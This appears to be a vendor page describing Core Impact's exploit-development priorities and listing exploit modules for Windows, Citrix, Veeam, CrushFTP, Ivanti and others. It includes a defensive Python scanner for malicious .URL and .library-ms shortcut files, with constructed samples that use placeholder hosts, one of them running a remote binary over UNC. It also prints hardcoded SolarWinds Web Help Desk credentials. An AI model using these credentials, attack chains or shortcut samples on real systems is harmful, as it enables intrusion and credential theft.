Exploit development is an advanced penetration testing skill that takes time to master, and on an engagement pen testers often don't have the resources to write a new exploit. Many resort to searching for and using pre-written exploits that have not been tested and must then go through time-consuming quality assurance testing to ensure they are safe and effective.
Core Impact users can save time by finding all the up-to-date exploits they need in one place. We provide a robust library of exploits designed to enable pen testers to safely and efficiently conduct successful penetration tests. Because they are written by our own internal team, you can trust that they have been thoroughly tested and validated by our experts.
The universe of vulnerabilities is huge, and not all of them represent the same risk to customers: some may be easily exploitable by a low-privileged user, while others may not be exploitable at all. To increase the efficiency of the attacks and the quality of the exploits provided, the Core Impact team has developed selection criteria to prioritize its analysis and implementation work. We determine which exploits warrant creation based on the following questions:
What are the most critical attacks from the attacker’s perspective?
What new vulnerabilities are more likely to be exploited in real attacks?
What exploits are the most valuable for Core Impact?
Once an exploit is approved, its priority order considers the following variables:
Vulnerability Properties: CVE, disclosure date, access mechanism and privileges needed.
Target Environment Setup: OS, application prevalence, version and special configurations needed.
Value Provided to Core Impact: Customer request, usage in multiple attacks, allows the installation of an agent, etc.
Technical Cost vs. Benefit: An analysis weighing the resources needed to build an exploit with the internal and external knowledge gained in its creation.
Each of these variables has a different weight, and together they produce a ranking of the potential exploits to be developed. Following those criteria, the top of the list would contain, for example, a vulnerability in Windows (the most widely deployed OS) that can be exploited remotely, without authentication, and that grants administrator-level privileges.
Correspondingly, a vulnerability in an application that is rarely installed, needs special configuration, and requires user interaction would be at the bottom.
Browse the Core Certified Exploit Library
We provide pen testers with real-time updates for a wide range of exploits for different platforms, operating systems, and applications.
Search our continuously growing library to discover an exploit that will allow you to gain and retain access on the target host or application.
Each library entry lists: Title, Description, Date Added, CVE Link, Exploit Platform, Exploit Type, and Product Name.
Microsoft Internet Shortcut Remote File Execution Vulnerability Exploit
The vulnerability relates to the use of Windows .URL files to execute a remote binary via a UNC path. When the targeted user opens or previews the .URL file (for example, from an email), the system attempts to access the specified path (for example, a WebDAV or SMB share), resulting in the execution of arbitrary code.
Microsoft Management Console MSC Exploit (CVE-2025-26633) Update
A vulnerability in the Microsoft Management Console (MMC) allows remote code execution via social engineering. The attack uses malicious HTML content in a .msc file, delivered through an embedded ActiveX control, and exploits the way Windows' internal Internet Explorer engine renders it. This update removes the one-link tag.
Citrix NetScaler ADC and Gateway Memory Overread Vulnerability CitrixBleed2 Exploit
Insufficient input validation leading to a memory overread in Citrix NetScaler ADC and Citrix NetScaler Gateway, when the NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or as an AAA virtual server, may allow unauthenticated remote attackers to exfiltrate cookies, session IDs, or passwords from the target application. The vulnerability is reached via the /p/u/doAuthentication.do endpoint. This module will attempt to trigger the vulnerability to determine whether the target system is vulnerable.
Microsoft Management Console MSC Exploit (CVE-2025-26633)
This module exploits a vulnerability in Microsoft Management Console (MMC). It runs a malicious web server on the CORE IMPACT Console and waits for an unsuspecting user to trigger the exploit by connecting to it. MMC contains a security flaw that allows remote code execution via malicious .msc files with an embedded ActiveX control. An attacker sends a crafted .msc file whose embedded ActiveX contains a link to the malicious server; the server executes a script that fetches a PowerShell file, ultimately deploying an agent.
This module uses an authenticated PHP object deserialization vulnerability to deploy an agent in Roundcube Webmail that will run with the same privileges as the web application. The module uses the given credentials to authenticate against Roundcube Webmail on the target. It then generates a payload for agent deployment and abuses the _from parameter handled in upload.php to inject it into the $_SESSION variable, which is later processed by the unserialize function in the rcube_session class.
The Vite development server is vulnerable to arbitrary file read due to insufficient path validation when processing URL requests. This exploit sends a crafted URL request to the Vite development server that includes the target filename combined with a specific query parameter. If the server responds 200 OK, the exploit decodes the server's Base64-encoded response and displays the file contents. Optionally, the exploit can save the leaked file locally at the location the user defines in the OUTPUT_PATH parameter.
Microsoft Windows library-ms NTLMv2 Information Disclosure Exploit
This exploit leverages an information disclosure vulnerability in Microsoft Windows. By crafting a malicious .library-ms file, an attacker can coerce the victim's machine into authenticating to an untrusted server and capture NTLMv2 hashes. This exploit does not install an agent; it obtains the NTLMv2 hash of a legitimate user. It is possible to use tools such as John the Ripper to attempt to crack the captured hash and recover the original password.
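The .URL entry above and this .library-ms entry both depend on a shortcut-style file that makes Windows reach out to an attacker-chosen UNC or WebDAV location. The following is an added example written for this page, not Core Impact code: a Python triage check that parses both formats with the standard library and reports every location that points off-box. The file contents at the bottom are constructed samples, and the hosts files.example.test and attacker.example.test are placeholders.

```python
# Added example (not Core Impact code): flag .URL and .library-ms files whose
# locations point at a remote host. Sample files below are constructed and
# their host names are placeholders.
import configparser
import re
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Targets that never leave the machine; "." and "?" are device-path prefixes.
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1", ".", "?"}
UNC_RE = re.compile(r"^\\\\([^\\/]+)")  # captures host in \\host\share\...
URL_KEYS = ("url", "iconfile", "workingdirectory")  # configparser lowercases keys


def remote_host(value: str) -> Optional[str]:
    """Return the host Windows would contact for this value, or None if local.
    Handles plain UNC paths, WebDAV-style UNC with an @port or @SSL host suffix,
    and file:// URLs with a host part. http(s) links are ordinary web links
    and are not reported."""
    value = value.strip()
    match = UNC_RE.match(value)
    if match:
        host = match.group(1)
    else:
        parsed = urlparse(value)
        if parsed.scheme.lower() != "file" or not parsed.netloc:
            return None
        host = parsed.netloc
    host = host.split("@")[0].lower()  # drop WebDAV @port / @SSL suffixes
    return None if host in LOCAL_HOSTS else host


def scan_url_file(text: str) -> List[Tuple[str, str]]:
    """List (key, host) pairs in an InternetShortcut (.URL) file that point
    off-box. URL= is what runs on open (the remote binary case above);
    IconFile= is fetched when Explorer renders the icon, so a UNC value there
    forces an outbound SMB/WebDAV connection without any click."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(text)
    except configparser.Error:
        return []
    findings = []
    for section in parser.sections():
        for key, value in parser.items(section):
            if key in URL_KEYS:
                host = remote_host(value)
                if host:
                    findings.append((key, host))
    return findings


def scan_library_ms(text: str) -> List[Tuple[str, str]]:
    """List every <url> location in a .library-ms document that points
    off-box; Explorer resolves these when the library is opened or previewed."""
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return []
    findings = []
    for elem in root.iter():  # compare the local tag name, ignoring the namespace
        if elem.tag.rsplit("}", 1)[-1] == "url" and elem.text:
            host = remote_host(elem.text)
            if host:
                findings.append(("url", host))
    return findings


def scan_shortcut(filename: str, text: str) -> List[Tuple[str, str]]:
    """Dispatch on extension; other file types are out of scope for this check."""
    name = filename.lower()
    if name.endswith(".url"):
        return scan_url_file(text)
    if name.endswith(".library-ms"):
        return scan_library_ms(text)
    return []


# Constructed samples with placeholder hosts, not real captured files.
SAMPLE_URL = r"""[InternetShortcut]
URL=\\files.example.test\share\invoice.exe
IconFile=\\files.example.test@80\DavWWWRoot\icon.ico
IconIndex=0
"""

BENIGN_URL = r"""[InternetShortcut]
URL=https://www.example.test/
IconFile=C:\Windows\System32\shell32.dll
IconIndex=13
"""

SAMPLE_LIBRARY = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\files.example.test\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

if __name__ == "__main__":
    for name, body in (("invoice.url", SAMPLE_URL), ("ok.url", BENIGN_URL),
                       ("docs.library-ms", SAMPLE_LIBRARY)):
        print(name, scan_shortcut(name, body) or "clean")
```

Run it over a quarantined attachment before opening it anywhere; any reported host that is not one of your own file servers is a reason to stop and pull the authentication logs for that name.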
This module exploits an arbitrary file deletion vulnerability that allows an unprivileged user to delete files in protected folders. Before deleting the file, the module backs up the file to the user's temporary folder.
This module uses an XML External Entity (XXE) vulnerability in combination with an authenticated OS command injection to deploy an agent in SysAid on-prem that will run with the sysaidinternal user privileges. The module uses the XXE vulnerability located in the com.ilient.mdm.GetMdmMessage Java class, reached via the /mdm/serverurl endpoint, to download the InitAccount.cmd file located in the C:\Program Files\SysAidServer\logs folder. The first line of InitAccount.cmd contains the username and password of the main administrator in plain text.
Exploit Type: Exploits / OS Command Injection / Known Vulnerabilities
Product Name: Impact
Windows Hyper-V NT Kernel Integration VSP Privilege Escalation Exploit (CVE-2025-21333)
The vulnerability in vkrnlintvsp.sys (VkiRootAdjustSecurityDescriptorForVmwp()) stems from insufficient validation of the AclSize field of the DACL in a Security Descriptor. Because this value is user-controlled, an attacker can trigger an integer overflow in the ExAllocatePool2() size calculation, leading to a heap-based buffer overflow that a local attacker can exploit for privilege escalation. The steps performed by the exploit are:
Spray WNF objects to control the heap layout.
Call NtCreateCrossVmEvent with a malicious Security Descriptor to overflow a heap buffer.
Veeam Backup and Replication Blacklist xmlFrameworkDs NET Deserialization Vulnerability Remote Code Execution Exploit
This module uses a .NET deserialization vulnerability to deploy an agent in Veeam Backup and Replication that will run with the NT AUTHORITY\SYSTEM user privileges. The module will trigger the vulnerability by crafting a Veeam.Backup.EsxManager.xmlFrameworkDs .NET class type object and sending it to the /VeeamAuthService .NET remoting endpoint using an external .NET executable. The deserialization of the crafted object will execute system commands to deploy the agent.
This vulnerability enables unauthenticated attackers to bypass authentication in CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0. The vulnerability stems from how the CrushAuth cookie and AWS4-style Authorization header are processed, allowing attackers to impersonate an administrator by crafting specific values using a valid username. A valid username is required for the attack to succeed, but no password is needed. By default, CrushFTP includes a built-in administrative user named crushadmin.
This module uses a message header injection vulnerability to deploy an agent in Apache Camel that will run with the same privileges as the web application. First, the module uses the vulnerability to determine the underlying operating system and check whether the target is vulnerable. If the OS can be determined, the target is assumed to be vulnerable and the vulnerability is used again to deploy an agent.
Exploit Type: Exploits / OS Command Injection / Known Vulnerabilities
Product Name: Impact
Microsoft Windows Cloud Files Mini Filter Driver Privilege Escalation Exploit (CVE-2024-30085)
The Cloud Files Mini Filter Driver (cldflt.sys) present in Microsoft Windows is vulnerable to a buffer overflow, which can result in an out-of-bounds memory write to paged pool memory. This module allows a local unprivileged user to execute arbitrary code with SYSTEM privileges. The steps performed by the exploit are:
Register a sync root and set its reparse point data.
Spray memory using WNF and ALPC.
Trigger the vulnerability to get an arbitrary write.
Overwrite the token privileges of the current process.
Inject a new agent into an elevated process to run as SYSTEM.
Microsoft Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability Exploit (CVE-2024-30085)
The Cloud Files Mini Filter Driver (cldflt.sys) present in Microsoft Windows is vulnerable to a buffer overflow, which can result in out-of-bounds memory write to paged pool memory. This module allows a local unprivileged user to execute arbitrary code with SYSTEM privileges.
Windows Error Reporting Privilege Escalation Exploit (CVE-2024-26169)
The Windows Error Reporting (WER) service, which runs with SYSTEM privileges, interacts with registry keys to store and process crash reports. The vulnerability stems from weak access controls on these registry keys, allowing a local attacker to exploit them for privilege escalation.
SolarWinds Web Help Desk Hardcoded Credentials Vulnerability Checker
CVE-2024-28987 affects SolarWinds Web Help Desk 12.8.3 Hotfix 1 and all previous versions due to the presence of hardcoded credentials in the application. This vulnerability allows an unauthenticated attacker to access the REST API using Basic Authentication with predefined credentials (helpdeskIntegrationUser/dev-C4F8025E7), enabling them to read, modify, and create tickets.
Microsoft Windows Common Log File System Driver Elevation of Privilege Vulnerability Exploit (CVE-2024-38196)
The Common Log File System Driver (clfs.sys) present in Microsoft Windows is vulnerable to a memory corruption vulnerability. This module allows a local unprivileged user to execute arbitrary code with SYSTEM privileges by creating a specially crafted BLF file. The steps performed by the exploit are:
Create a crafted BLF file.
Trigger the vulnerability to get an arbitrary read/write primitive.
Get SYSTEM privileges by replacing the current process token.
Windows Common Log File System Driver LoadContainerQ Elevation of Privilege Vulnerability Exploit
The CLFS.sys driver before 10.0.22621.4601 in Windows 11 23H2 exposes functionality that allows low-privileged users to read and write arbitrary memory via specially crafted requests and elevate their privileges. The steps performed by the exploit are:
Allocate memory at address 0x0000000002100000 (stored in the variable pcclfscontainer).
Call CreateLogFile() and AddLogContainer() to create the .BLF and container files under the selected path.
Fetch the malicious .BLF from the data replaced in the executable and overwrite the original .BLF with the crafted one.
Microsoft Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability Exploit (CVE-2024-38144)
The Kernel Streaming WOW Thunk Service module (ksthunk.sys) present in Microsoft Windows is vulnerable to an integer overflow, which can result in arbitrary memory write. This module allows a local unprivileged user to execute arbitrary code with SYSTEM privileges.
Microsoft Windows Ancillary Function Driver UAF Privilege Escalation Exploit (CVE-2024-38193)
The afd.sys module present in Microsoft Windows is vulnerable to a race condition during buffer management, where a temporary reference counter increment is improperly handled, leading to a use-after-free. This occurs when accessing registered buffers for send/receive operations. The steps performed by the exploit are:
Create corrupt kernel structures.
Get arbitrary read/write primitives.
Steal a token for privilege escalation.
Restore the system state.
Create a new agent process running as SYSTEM.
Enhance identity management in exploits.
Linked created identities in the Module Output: added a reference to the created identity in the Module Output.
Added Validated and Validated in properties to identities: ensured that created identities include Validated=True and are associated with the target (Validated in) where they were verified.
This module uses a stack-based buffer overflow vulnerability to deploy an agent in Ivanti Connect Secure that will run with the nr user privileges. First, the module checks whether the target is an Ivanti Connect Secure appliance. If it is, it determines whether the target is vulnerable by retrieving its version number using two different methods. Then, the module tries to leak the base address of the libdsplibs.so library; to do this, a random endpoint is registered in the local web server.